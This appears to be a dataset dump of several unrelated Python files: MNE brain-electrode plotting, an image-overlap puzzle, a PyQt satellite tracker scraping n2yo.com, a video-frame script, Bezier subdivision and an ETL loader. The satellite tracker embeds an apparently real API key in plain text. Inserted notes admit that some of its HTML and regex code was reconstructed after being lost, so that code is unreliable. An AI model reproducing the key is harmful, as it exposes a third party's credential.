lists\n if isinstance(picks[0], int):\n picks = [list(labels.keys())[p] for p in picks]\n picks = [p for p in picks if not any(w in labels[p] for w in bad_words)]\n return picks\n\n\ndef get_sub(inst: Signal | mne.Info | str) -> str:\n \"\"\"Gets the subject from the 
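`pick_no_wm` keeps only the channels whose anatomical labels avoid a set of bad words. The core of that filter, reduced to plain dict and list operations:

```python
BAD_WORDS = ("Unknown", "unknown", "hypointensities", "White-Matter")

def drop_bad_channels(labels):
    # labels maps channel name -> anatomical label string
    return [ch for ch, lab in labels.items()
            if not any(w in lab for w in BAD_WORDS)]

labels = {"LT1": "ctx-lh-superiortemporal",
          "LT2": "Left-Cerebral-White-Matter"}
print(drop_bad_channels(labels))  # ['LT1']
```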
instance\n\n Parameters\n ----------\n inst : Signal\n The instance to get the subject from\n\n Returns\n -------\n str\n The subject\"\"\"\n if isinstance(inst, Signal):\n inst = inst.info\n elif isinstance(inst, str):\n return f\"{inst[0]}{int(inst[1:])}\"\n out_str = inst['subject_info']['his_id'][4:]\n if len(out_str) == 1:\n return out_str\n return out_str[0] + str(int(out_str[1:]))\n\n\ndef plot_subj(inst: Signal | mne.Info | str, subj_dir: PathLike = None,\n picks: list[str | int] = None, no_wm: bool = False,\n labels_every: int | None = 8, surface: str = 'pial',\n hemi: str = 'both', fig: Brain = None,\n trans=None, color: matplotlib.colors = (1, 1, 1),\n size: float = 0.35, show: bool = True, background: str = 'white', title: str = None\n ) -> Brain:\n \"\"\"Plots the electrodes on the subject's brain\n\n Parameters\n ----------\n inst : Signal | mne.Info | str\n The subject to plot\n subj_dir : PathLike, optional\n The subjects directory, by default HOME / 'Box' / 'ECoG_Recon'\n picks : list[str | int], optional\n The channels to plot, by default all\n no_wm : bool, optional\n Whether to remove the white matter channels, by default False\n labels_every : int, optional\n How often to label the channels, by default 8\n fig : Brain, optional\n The figure to plot on, by default None\n surface : str, optional\n The surface to plot, by default 'pial'\n hemi : str, optional\n The hemisphere to plot, by default 'split'\n trans: mne.transforms.Transform, optional\n The transformation to apply, by default None\n color : matplotlib.colors, optional\n The color of the electrodes, by default (1,1,1)\n size : float, optional\n The size of the electrodes, by default 0.35\n show : bool, optional\n Whether to show the figure, by default True\n background: str, optional\n Background color\n title : string, optional\n Title the plot\n\n Returns\n -------\n Brain\n The brain plot\n \"\"\"\n if isinstance(inst, Signal):\n info = inst.info\n sub = get_sub(info)\n elif isinstance(inst, mne.Info):\n info = inst\n sub = get_sub(info)\n elif isinstance(inst, str):\n info = subject_to_info(inst, subj_dir)\n sub = inst\n else:\n raise TypeError(\n f\"inst must be Signal, mne.Info, or str, not {type(inst)}\")\n\n if subj_dir is None:\n subj_dir = get_sub_dir(subj_dir)\n if trans is None:\n trans = mne.transforms.Transform(fro='head', to='mri')\n if fig is None:\n fig = Brain(sub, subjects_dir=subj_dir, cortex='low_contrast',\n alpha=0.5, background=background, surf=surface, hemi=hemi,\n show=show)\n \n # Set the title if provided\n if title is not None:\n mne.viz.set_3d_title(fig, title, size=40)\n\n if picks is None:\n picks = info.ch_names\n if no_wm:\n picks = pick_no_wm(picks,\n gen_labels(info, sub, subj_dir, info.ch_names))\n if isinstance(picks[0], str):\n picks = mne.pick_channels(info.ch_names, picks)\n\n info: mne.Info = mne.pick_info(info, picks)\n\n # fig.add_sensors(info, trans)\n montage = info.get_montage()\n force2frame(montage, trans.from_str)\n montage.apply_trans(trans)\n pos = {k: v * 1000 for k, v in montage.get_positions()['ch_pos'].items()}\n\n # Default montage positions are in m, whereas plotting functions assume mm\n left = {k: p for k, p in pos.items() if k.startswith('L')}\n right = {k: p for k, p in pos.items() if k.startswith('R')}\n\n if left and hemi != 'rh':\n fig.add_foci(np.vstack(list(left.values())), hemi='lh', color=color,\n scale_factor=size)\n if right and hemi != 'lh':\n fig.add_foci(np.vstack(list(right.values())), hemi='rh', color=color,\n scale_factor=size)\n\n if 
labels_every is not None:\n settings = dict(shape=None, always_visible=True, text_color=(0, 0, 0),\n bold=False)\n _add_labels(fig, info, sub, labels_every, hemi,\n (left, right), **settings)\n\n return fig\n\n\ndef _add_labels(fig, info, sub, every, hemi, lr, **kwargs):\n names = info.ch_names[slice(every - 1, -1, every)]\n\n if not hemi == 'both':\n for hems, pos in enumerate(lr):\n if (not pos) or \\\n (hemi == 'lh' and hems == 1) or \\\n (hemi == 'rh' and hems == 0):\n continue\n\n plt_names = filter(lambda x: x.startswith(['L', 'R'][hems]), names)\n plt_names = [f'{sub}-{n}' for n in plt_names]\n positions = np.array([pos[n.split(\"-\")[1]] for n in plt_names])\n fig.plotter.subplot(0, hems)\n fig.plotter.add_point_labels(positions, plt_names, **kwargs)\n else:\n pos = {}\n for hem in lr:\n if hem:\n pos.update(hem)\n plt_names = [f'{sub}-{n}' for n in names]\n positions = np.array([pos[name] for name in names])\n fig.plotter.add_point_labels(positions, plt_names, **kwargs)\n\n\ndef subject_to_info(subject: str, subjects_dir: PathLike = None,\n ch_types: str = \"seeg\", sfreq: int = 2000) -> mne.Info:\n \"\"\"Gets the info for a subject from the subjects directory\n\n Parameters\n ----------\n subject : str\n The subject to get the info for\n subjects_dir : PathLike, optional\n The subjects directory, by default HOME / 'Box' / 'ECoG_Recon'\n ch_types : str, optional\n The channel type, by default \"seeg\"\n sfreq : int, optional\n The sampling frequency, by default 2000\n\n Returns\n -------\n mne.Info\n The info for the subject\n \"\"\"\n subjects_dir = get_sub_dir(subjects_dir)\n elec_file = op.join(subjects_dir, subject, 'elec_recon',\n subject + '_elec_locations_RAS_brainshifted.txt')\n elecs = dict()\n with open(elec_file, 'r') as fd:\n reader = csv.reader(fd)\n for row in reader:\n line = row[0].split(\" \")\n elecs[\"\".join(line[0:2])] = tuple(\n float(n) / 1000 for n in line[2:5])\n info = mne.create_info(list(elecs.keys()), sfreq, ch_types)\n montage = mne.channels.make_dig_montage(elecs, nasion=(0, 0, 0),\n coord_frame='ras')\n info.set_montage(montage)\n return info\n\n\n@singledispatch\ndef force2frame(montage: mne.channels.DigMontage, frame: str):\n \"\"\"Forces the montage to be in the specified frame\n\n Parameters\n ----------\n montage : mne.channels.DigMontage\n The montage to force\n frame : str, optional\n The frame to force to, by default 'mri'\n \"\"\"\n\n settings = dict(fro=montage.get_positions()['coord_frame'],\n to=frame, trans=np.eye(4))\n # current subjects are in 'mri' space, even though it says head\n if not settings['fro'] == frame:\n trans = mne.transforms.Transform(**settings)\n montage.apply_trans(trans)\n\n\n@force2frame.register\ndef _(info: mne.Info, frame: str):\n montage = info.get_montage()\n force2frame(montage, frame)\n info.set_montage(montage)\n\n\ndef gen_labels(info: mne.Info, sub: str = None, subj_dir: PathLike = None,\n picks: list[str] = None) -> OrderedDict[str, list[str]]:\n \"\"\"Generates the labels for the electrodes\n\n Parameters\n ----------\n info : mne.Info\n The subject to get the labels for\n subj_dir : PathLike, optional\n The subjects directory, by default None\n picks : list[str | int], optional\n The channels to plot, by default None\n\n Returns\n -------\n dict[str, list]\n The labels for the electrodes\n \"\"\"\n\n sub = get_sub(info) if sub is None else sub\n subj_dir = get_sub_dir(subj_dir)\n montage = info.get_montage()\n force2frame(montage, 'mri')\n # aseg = 'aparc.a2009s+aseg' # parcellation/anatomical 
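`subject_to_info` above parses electrode rows of the form `"<group> <number> <x> <y> <z>"` and converts millimeters to meters before building the montage. The parsing step in isolation, with made-up rows:

```python
rows = ["LT 1 12.3 45.6 78.9", "LT 2 13.1 46.0 79.2"]
elecs = {}
for row in rows:
    line = row.split(" ")
    # join group and number into a channel name; scale mm -> m
    elecs["".join(line[0:2])] = tuple(float(n) / 1000 for n in line[2:5])
print(elecs["LT1"])  # (0.0123, 0.0456, 0.0789)
```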
segmentation atlas\n labels = get_elec_volume_labels(sub, subj_dir)\n\n new_labels = OrderedDict()\n if picks is None:\n picks = info.ch_names\n\n bad_words = ('Unknown', 'unknown', 'hypointensities')\n for p in picks:\n i = 2\n label = labels.T[p].T\n while ((\"White-Matter\" in label[i] and label[i + 1] < 0.8)\n or (any(w in label[i] for w in bad_words) and label[\n i + 1] < 1)):\n if (i + 2) <= len(label.T):\n break\n elif label[i + 2].isspace():\n break\n i += 2\n new_labels[p] = label[i]\n return new_labels\n\n\nif __name__ == \"__main__\":\n from ieeg.io import get_data\n from os import path\n\n HOME = path.expanduser(\"~\")\n LAB_root = path.join(HOME, \"Box\", \"CoganLab\")\n # %% Set up logging\n log_filename = \"output.log\"\n # op.join(LAB_root, \"Aaron_test\", \"Information.log\")\n mne.set_log_file(log_filename,\n \"%(levelname)s: %(message)s - %(asctime)s\",\n overwrite=True)\n mne.set_log_level(\"INFO\")\n TASK = \"SentenceRep\"\n sub_num = 59\n layout = get_data(TASK, root=LAB_root)\n subj_dir = op.join(LAB_root, \"ECoG_Recon_Full\")\n sub_pad = \"D\" + str(sub_num).zfill(4)\n # sub = \"D{}\".format(sub_num)\n\n # filt = raw_from_layout(layout.derivatives['clean'], subject=sub_pad,\n # extension='.edf', desc='clean', preload=False)\n\n ##\n sample_path = mne.datasets.sample.data_path()\n subjects_dir = sample_path / \"subjects\"\n\n brain = plot_subj(\"D29\")\n # plot_on_average(filt)\n # plot_gamma(raw)\n","repo_name":"coganlab/IEEG_Pipelines","sub_path":"ieeg/viz/mri.py","file_name":"mri.py","file_ext":"py","file_size_in_byte":22412,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7810445688","text":"'''\ndef translate(img, key):\n if key == \"up\":\n size = len(img.pop(0))\n img.append([0]*size)\n return img\n elif key == \"down\":\n size = len(img.pop(-1))\n img.insert(0, [0]*size)\n return img\n elif key == \"left\":\n for x in range(len(img)):\n img[x].pop(0)\n img[x].append(0)\n return img\n elif key == \"right\":\n for x in range(len(img)):\n img[x].pop(-1)\n img[x].insert(0, 0)\n return img\ndef overlap(img1, img2):\n count = 0\n for x in range(len(img1)):\n for y in range(len(img2)):\n if img1[x][y] == 1 and img1[x][y] == img2[x][y]:\n count+=1\n return count\n\ndef largestOverlap(img1, img2, max_num):\n trls = []\n olap = []\n trls.append(translate(img1, 'up'))\n trls.append(translate(img1, 'down'))\n trls.append(translate(img1, 'left'))\n trls.append(translate(img1, 'right'))\n olap.append(overlap(trls[0], img2))\n olap.append(overlap(trls[1], img2))\n olap.append(overlap(trls[2], img2))\n olap.append(overlap(trls[3], img2))\n max_key = olap.index(max(olap))\n if olap[max_key] > max_num:\n largestOverlap(trls[max_key] ,img2, max_num)\n else:\n return max_num\n'''\ndef largestOverlap(img1, img2):\n dimensions = len(img1)\n def shift_count(x_shift, y_shift, img1, img2):\n l_shitft_count, r_shift_count = 0, 0\n for x1, x2 in enumerate(range(y_shift,dimensions)):\n for y1, y2 in enumerate(range(x_shift,dimensions)):\n if img1[x2][y2] == 1 and img1[x2][y2] == img2[x1][y1]:\n l_shitft_count +=1\n if img1[x2][y1] == 1 and img1[x2][y1] == img2[x1][y2]:\n r_shift_count +=1\n return(max(l_shitft_count, r_shift_count))\n max_nums = 0\n for y in range(0,dimensions):\n for x in range(0,dimensions):\n max_nums= max(max_nums, shift_count(x, y, img1, img2))\n max_nums= max(max_nums, shift_count(x, y, img2, img1))\n return max_nums\n\n\nimg1 = [[1,1,0],\n [0,1,0],\n [0,1,0]]\nimg2 = [[0,0,0],\n [0,1,1],\n 
[0,0,1]]\n\nprint(largestOverlap(img1, img2))","repo_name":"cookiewho/IPS_Workshop_2020","sub_path":"4_ImageOverlap.py","file_name":"4_ImageOverlap.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72093734865","text":"import sys\nimport os\nimport re\nimport json\nimport requests\nimport geocoder\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom PyQt5 import QtWebEngineWidgets\nfrom PyQt5.QtWebEngineWidgets import QWebEngineSettings\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QAbstractItemView, QVBoxLayout, QHBoxLayout, QGridLayout, QTableWidgetItem, QLineEdit, QComboBox, QLabel, QSplashScreen, QSpacerItem, QSizePolicy, QFrame, QCheckBox, QCompleter, QTableWidget, QPlainTextEdit\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import * \nimport matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nimport operator\nfrom functools import reduce\n\ndefault_norad_id = 25544\ndef generateMap(norad_id):\n string = '''\n \n \n \n
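A numpy rendering (hypothetical `largest_overlap` helper) of the shifting search in `4_ImageOverlap.py` above, reproducing its expected answer of 3 for the sample images:

```python
import numpy as np

def largest_overlap(a, b):
    a, b = np.array(a), np.array(b)
    n = a.shape[0]
    best = 0
    for dx in range(-n + 1, n):
        for dy in range(-n + 1, n):
            # slide `a` by (dx, dy), zero-padding the exposed border
            shifted = np.zeros_like(a)
            src = a[max(0, -dx):n - max(0, dx), max(0, -dy):n - max(0, dy)]
            shifted[max(0, dx):max(0, dx) + src.shape[0],
                    max(0, dy):max(0, dy) + src.shape[1]] = src
            best = max(best, int(np.sum((shifted == 1) & (b == 1))))
    return best

img1 = [[1, 1, 0], [0, 1, 0], [0, 1, 0]]
img2 = [[0, 0, 0], [0, 1, 1], [0, 0, 1]]
print(largest_overlap(img1, img2))  # 3
```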
<!-- The HTML that built this page was lost during extraction; it embedded a live satellite-tracking map for NORAD id {0}. -->
\n '''.format(norad_id)\n\n with open('map.html', 'w') as file:\n file.write(string)\n\ngenerateMap(default_norad_id)\n\nn2yo_API_key = \"HMD6AC-Q39DWN-F3S3XJ-5215\"\n\nsatellite_name_id_df = pd.read_csv(\"sat_name_id_file.csv\")\nsatellite_name_id_df[\"Combined\"] = satellite_name_id_df['OBJECT_NAME'].astype(str) + \" - \" + satellite_name_id_df[\"NORAD_CAT_ID\"].astype(str)\ncombined = list(satellite_name_id_df[\"Combined\"])\n\nclass MplCanvas(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n super(MplCanvas, self).__init__(fig)\n\ndef get_sat_details(link):\n response = requests.get(link)\n content = response.content.decode('utf-8')\n\n with open('n2yo.txt', 'w') as f:\n f.write(content)\n\n with open('n2yo.txt', 'r') as f:\n content = f.read()\n\n soup = BeautifulSoup(content, 'html.parser')\n sat_description = soup.find(id=\"satinfo\").find_all(\"br\")[-1].next_sibling\n\n match_sat_name = re.search(r'

<h1>(.*?)</h1>', content)\n    # NOTE: the HTML tag markup inside these scraping patterns was lost during\n    # extraction; the patterns below are a best-effort reconstruction and may\n    # need checking against the live n2yo.com page source.\n    match_norad_id = re.search(r'NORAD ID\\s*:\\s*(\\d+)', content)\n    match_int_code = re.search(r'Int\\'l Code\\s*:\\s*([^<]+)', content)\n    match_period = re.search(r'Period\\s*:\\s*([^<]+)', content)\n    launch_site = re.search(r'Launch site\\s*:\\s*(.*?)\\s*
', content)\n\n if match_sat_name and match_norad_id and match_int_code and match_period and launch_site:\n return sat_description, match_sat_name.group(1), int(match_norad_id.group(1)), match_int_code.group(1), match_period.group(1), launch_site.group(1)\n else:\n return None, None, None, None, None, None\n\ndef obtainData(sat_id): \n userLocation = geocoder.ip('me')\n data = requests.get(\"https://api.n2yo.com/rest/v1/satellite/positions/{0}/{1}/{2}/0/10800/&apiKey={3}\".format(sat_id, userLocation.lat, userLocation.lng, n2yo_API_key))\n data = data.text\n obj = json.loads(data)\n sat_location_df = pd.json_normalize(obj['positions'])\n json_formatted_str = json.dumps(obj, indent= 6)\n with open(\"location.json\", \"w\") as outfile:\n outfile.write(json_formatted_str)\n\n sat_latitudes = sat_location_df['satlatitude'].values.tolist()\n sat_longitudes = sat_location_df['satlongitude'].values.tolist()\n sat_altitude = sat_location_df['sataltitude'].values.tolist()\n\n return sat_latitudes, sat_longitudes, sat_altitude\n\nclass Main(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('SatSpy 1.0')\n generateMap(25544)\n CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))\n self.map_view = os.path.join(CURRENT_DIR, \"map.html\")\n\n self.web = QtWebEngineWidgets.QWebEngineView()\n self.web.page().settings().setAttribute(QWebEngineSettings.ShowScrollBars, False)\n self.web.load(QtCore.QUrl.fromLocalFile(self.map_view))\n self.web.resize(200, 600)\n\n self.exitBtn = QPushButton('Exit', self)\n self.exitBtn.resize(self.exitBtn.sizeHint())\n self.exitBtn.clicked.connect(self.close)\n\n self.searchBtn = QPushButton('Search', self)\n self.searchBtn.resize(self.searchBtn.sizeHint())\n self.searchBtn.clicked.connect(self.searchButtonFunc)\n\n searchBox_Layout = QVBoxLayout()\n horizontalLine = QLabel(\"\")\n horizontalLine.setFrameStyle(QFrame.HLine)\n self.satSearchBox = QLineEdit()\n sat_name_id_completer = QCompleter(combined)\n sat_name_id_completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)\n\n searchbox_grid_layout = QGridLayout()\n searchbox_grid_layout.addWidget(self.satSearchBox, 1, 0)\n searchbox_grid_layout.addWidget(self.searchBtn, 1, 1)\n self.satSearchBox.setCompleter(sat_name_id_completer)\n self.description_label = QLabel(\"Satellite Description: \")\n self.description_box = QPlainTextEdit(self)\n self.description_box.insertPlainText(\"\")\n self.description_box.setReadOnly(True)\n self.description_box.toPlainText()\n searchBox_Layout.addWidget(QLabel(\"Find a satellite by Name or ID: \"))\n searchBox_Layout.addLayout(searchbox_grid_layout)\n verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\n self.table = QTableWidget(5, 2)\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.table.verticalHeader().setVisible(False)\n self.table.horizontalHeader().setVisible(False)\n self.table.horizontalHeader().resizeSection(0, 100)\n self.table.horizontalHeader().resizeSection(1, 130)\n self.table.setItem(0, 0, QTableWidgetItem(\"Name:\"))\n self.table.item(0, 0).setFlags(Qt.NoItemFlags)\n self.table.item(0, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(0, 1, QTableWidgetItem(\"\"))\n self.table.item(0, 1).setFlags(Qt.NoItemFlags)\n self.table.item(0, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(1, 0, QTableWidgetItem(\"NORAD ID:\"))\n self.table.item(1, 0).setFlags(Qt.NoItemFlags)\n self.table.item(1, 
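`obtainData` flattens the n2yo `positions` array with `pd.json_normalize` before pulling out the latitude, longitude, and altitude columns. What that call produces, on an inline two-row payload:

```python
import pandas as pd

payload = {"positions": [
    {"satlatitude": 41.2, "satlongitude": -71.9, "sataltitude": 437.4},
    {"satlatitude": 41.5, "satlongitude": -71.2, "sataltitude": 437.5},
]}
# each dict becomes a row; keys become columns
df = pd.json_normalize(payload["positions"])
print(df["satlatitude"].tolist())  # [41.2, 41.5]
```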
0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(1, 1, QTableWidgetItem(\"\"))\n self.table.item(1, 1).setFlags(Qt.NoItemFlags)\n self.table.item(1, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(2, 0, QTableWidgetItem(\"Int'l Code:\"))\n self.table.item(2, 0).setFlags(Qt.NoItemFlags)\n self.table.item(2, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(2, 1, QTableWidgetItem(\"\"))\n self.table.item(2, 1).setFlags(Qt.NoItemFlags)\n self.table.item(2, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(3, 0, QTableWidgetItem(\"Period:\"))\n self.table.item(3, 0).setFlags(Qt.NoItemFlags)\n self.table.item(3, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(3, 1, QTableWidgetItem(\"\"))\n self.table.item(3, 1).setFlags(Qt.NoItemFlags)\n self.table.item(3, 1).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(4, 0, QTableWidgetItem(\"Launch site:\"))\n self.table.item(4, 0).setFlags(Qt.NoItemFlags)\n self.table.item(4, 0).setForeground(QBrush(QColor(255, 255, 255)))\n self.table.setItem(4, 1, QTableWidgetItem(\"\"))\n self.table.item(4, 1).setFlags(Qt.NoItemFlags)\n self.table.item(4, 1).setForeground(QBrush(QColor(255, 255, 255)))\n\n left_Grid_Layout = QGridLayout()\n left_Grid_Layout.addLayout(searchBox_Layout, 1, 0, QtCore.Qt.AlignTop)\n left_Grid_Layout.addWidget(horizontalLine, 2, 0)\n left_Grid_Layout.addWidget(self.description_label, 3, 0)\n left_Grid_Layout.addWidget(self.description_box, 4, 0)\n left_Grid_Layout.addWidget(self.table, 5, 0)\n left_Grid_Layout.addItem(verticalSpacer, 6, 0)\n left_Grid_Layout.addWidget(self.exitBtn, 7, 0)\n left_Grid_Layout.setSpacing(15)\n\n h_Layout = QHBoxLayout(self)\n h_Layout.addLayout(left_Grid_Layout)\n h_Layout.addWidget(self.web, 3)\n\n def searchButtonFunc(self):\n sat_details = self.satSearchBox.text()\n sat_details = sat_details.split(' - ')\n sat_latitude, sat_longitude, sat_altitude = obtainData(sat_details[1])\n def countList(lst1, lst2):\n return reduce(operator.add, zip(lst1, lst2))\n sat_telemetry = countList(sat_latitude, sat_longitude)\n sat_telemetry = [sat_telemetry[idx:idx+2] for idx in range(0, len(sat_telemetry), 2)]\n with open(\"telemetry.txt\", \"w\") as file:\n for element in sat_telemetry:\n file.write(str(element) + \",\" + \"\\n\")\n with open(\"altitudes.txt\", \"w\") as file:\n for element in sat_altitude:\n file.write(str(element) + \",\" + \"\\n\")\n\n sat_description, sat_name, norad_id, int_code, sat_period, launch_site = get_sat_details(\"https://www.n2yo.com/satellite/?s={0}\".format(sat_details[1]))\n print(sat_name, norad_id, int_code, sat_period, launch_site)\n\n generateMap(sat_details[1])\n self.web.load(QtCore.QUrl.fromLocalFile(self.map_view))\n self.description_box.setPlainText(\"{0}\".format(sat_description))\n self.table.item(0, 1).setText(\"{0}\".format(sat_name))\n self.table.item(1, 1).setText(\"{0}\".format(norad_id))\n self.table.item(2, 1).setText(\"{0}\".format(int_code))\n self.table.item(3, 1).setText(\"{0}\".format(sat_period))\n self.table.item(4, 0).setTextAlignment(QtCore.Qt.AlignTop)\n self.table.item(4, 1).setText(\"{0}\".format(launch_site))\n self.table.resizeRowsToContents()\n print(sat_description)\n\napp = QApplication(sys.argv)\nmain = 
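The repeated `setItem`/`setFlags`/`setForeground` calls above are a natural candidate for one loop over the field names. A hypothetical refactor sketch (same PyQt5 calls, just collapsed):

```python
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QBrush, QColor
from PyQt5.QtWidgets import QApplication, QTableWidget, QTableWidgetItem

app = QApplication(sys.argv)  # a QApplication must exist before any widget
table = QTableWidget(5, 2)
fields = ["Name:", "NORAD ID:", "Int'l Code:", "Period:", "Launch site:"]
for row, field in enumerate(fields):
    for col, text in enumerate((field, "")):
        item = QTableWidgetItem(text)
        item.setFlags(Qt.NoItemFlags)                      # read-only cell
        item.setForeground(QBrush(QColor(255, 255, 255)))  # white text
        table.setItem(row, col, item)
```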
Main()\nmain.show()\nmain.setFixedWidth(1142)\nmain.setFixedHeight(730)\napp.exec_()","repo_name":"MinaBasem/SatSpy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1202315490","text":"import os\nimport imageio\n\n# Directory containing the PNG files\ndirectory = 'images/'\n\n# Create a list of file names in the directory\nfile_names = sorted(os.listdir(directory))\n\n# Initialize the video writer\noutput_file = 'Hy_video.mp4'\nwriter = imageio.get_writer(output_file, fps=30) # Adjust the frame rate (fps) as needed\n\n# Loop through the file names and add frames to the video\nfor file_name in file_names:\n # Check if the file is a PNG file\n if file_name.endswith('.png'):\n file_path = os.path.join(directory, file_name)\n\n # Read the PNG file and add it as a frame in the video\n image = imageio.imread(file_path)\n writer.append_data(image)\n\n# Close the video writer\nwriter.close()\n\nprint(f'Video saved: {output_file}')\n","repo_name":"lukebodm/EM_nodal_DG","sub_path":"video_plotter.py","file_name":"video_plotter.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41528250753","text":"#!/usr/bin/env python3\n# Created by: Katie G\n# Created on: October 13th, 2022\n# This program gets an integer from\n# the user and checks to see if it is\n# positive, negative, or zero using\n# an if.. else if.. else statement.\n\n# this function will get the integer,\n# then check to see if it is positive,\n# negative, or zero.\ndef main():\n # getting the integer from the user\n user_int = int(input(\"Hello :) Integer please :) \"))\n\n # if.. else if.. else statement to check\n # if user int is positive, negative or zero.\n if user_int >= 1:\n print(\"Oh. Your integer ({}) is positive.\".format(user_int))\n elif user_int <= -1:\n print(\"Oh. Your integer ({}) is negative.\".format(user_int))\n else:\n print(\"Oh. 
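`video_plotter.py` above relies on `sorted(os.listdir(...))`, which sorts lexicographically, so `frame10.png` lands before `frame2.png` unless the names are zero-padded. A numeric sort key avoids the surprise:

```python
import re

names = ["frame10.png", "frame2.png", "frame1.png"]

def frame_number(name):
    # pull the first run of digits out of the filename
    m = re.search(r"(\d+)", name)
    return int(m.group(1)) if m else -1

print(sorted(names, key=frame_number))
# ['frame1.png', 'frame2.png', 'frame10.png']
```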
Your integer ({}) is zero.\".format(user_int))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ICS3U-Programming-Katie-G/Unit3-04-Python","sub_path":"integer.py","file_name":"integer.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26403930192","text":"from ffgeom import Point, Segment\n\n\ndef maxdist(points):\n ((p0x, p0y), (p1x, p1y), (p2x, p2y), (p3x, p3y)) = points\n p0 = Point(p0x, p0y)\n p1 = Point(p1x, p1y)\n p2 = Point(p2x, p2y)\n p3 = Point(p3x, p3y)\n\n s1 = Segment(p0, p3)\n return max(s1.distanceToPoint(p1), s1.distanceToPoint(p2))\n\n\ndef cspsubdiv(csp, flat):\n for sp in csp:\n subdiv(sp, flat)\n\n\ndef subdiv(sp, flat, i=1):\n while i < len(sp):\n p0 = sp[i - 1][1]\n p1 = sp[i - 1][2]\n p2 = sp[i][0]\n p3 = sp[i][1]\n\n b = (p0, p1, p2, p3)\n m = maxdist(b)\n if m <= flat:\n i += 1\n else:\n one, two = beziersplitatt(b, 0.5)\n sp[i - 1][2] = one[1]\n sp[i][0] = two[2]\n p = [one[2], one[3], two[1]]\n sp[i:1] = [p]\n\n\ndef tpoint(point1, point2, t):\n (x1, y1) = point1\n (x2, y2) = point2\n return x1 + t * (x2 - x1), y1 + t * (y2 - y1)\n\ndef beziersplitatt(points, t):\n ((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)) = points\n m1 = tpoint((bx0, by0), (bx1, by1), t)\n m2 = tpoint((bx1, by1), (bx2, by2), t)\n m3 = tpoint((bx2, by2), (bx3, by3), t)\n m4 = tpoint(m1, m2, t)\n m5 = tpoint(m2, m3, t)\n m = tpoint(m4, m5, t)\n\n return ((bx0, by0), m1, m4, m), (m, m5, m3, (bx3, by3))\n\n","repo_name":"santhoshtr/hand","sub_path":"training/cspsubdiv.py","file_name":"cspsubdiv.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8567325753","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"\n Description: This function is responsible for reading the JSON file in the given directory as a dataframe,\n and then inserting the first record of the song data and artist data to the songs and artists tables respectively.\n\n Arguments:\n cur: the cursor object.\n filepath: log data or song data file path.\n\n Returns:\n None\n \"\"\"\n # open song file\n df = pd.read_json(filepath, lines=True)\n\n # insert song record\n song_data = df[['song_id', 'title', 'artist_id', 'year', 'duration']].values[0].tolist()\n cur.execute(song_table_insert, song_data)\n \n # insert artist record\n artist_data = df[['artist_id', 'artist_name', 'artist_location', 'artist_latitude', 'artist_longitude']].values[0].tolist()\n cur.execute(artist_table_insert, artist_data)\n\n\ndef process_log_file(cur, filepath):\n \"\"\"\n Description: This function is responsible for reading the JSON file in the given directory as a dataframe, filtering the dataframe to include only\n the records matching the NextSong page value, creating different time granurality features from the timestamp feature\n and then inserting and loading the relevant dataframe features into their corresponding tables such as songplay and users tables.\n\n Arguments:\n cur: the cursor object.\n filepath: log data or song data file path.\n\n Returns:\n None\n \"\"\"\n \n # open log file\n df = pd.read_json(filepath, lines=True)\n\n # filter by NextSong action\n df = df[df['page'] == 'NextSong']\n\n # convert timestamp column to datetime\n df['ts'] = pd.to_datetime(df['ts'], unit='ms')\n t = df\n t['hour'] = t['ts'].dt.hour\n t['day'] = 
